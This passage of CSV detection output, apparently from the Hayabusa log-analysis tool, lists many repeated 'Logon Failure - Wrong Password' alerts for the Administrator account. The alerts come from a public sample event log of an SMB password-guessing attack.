Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
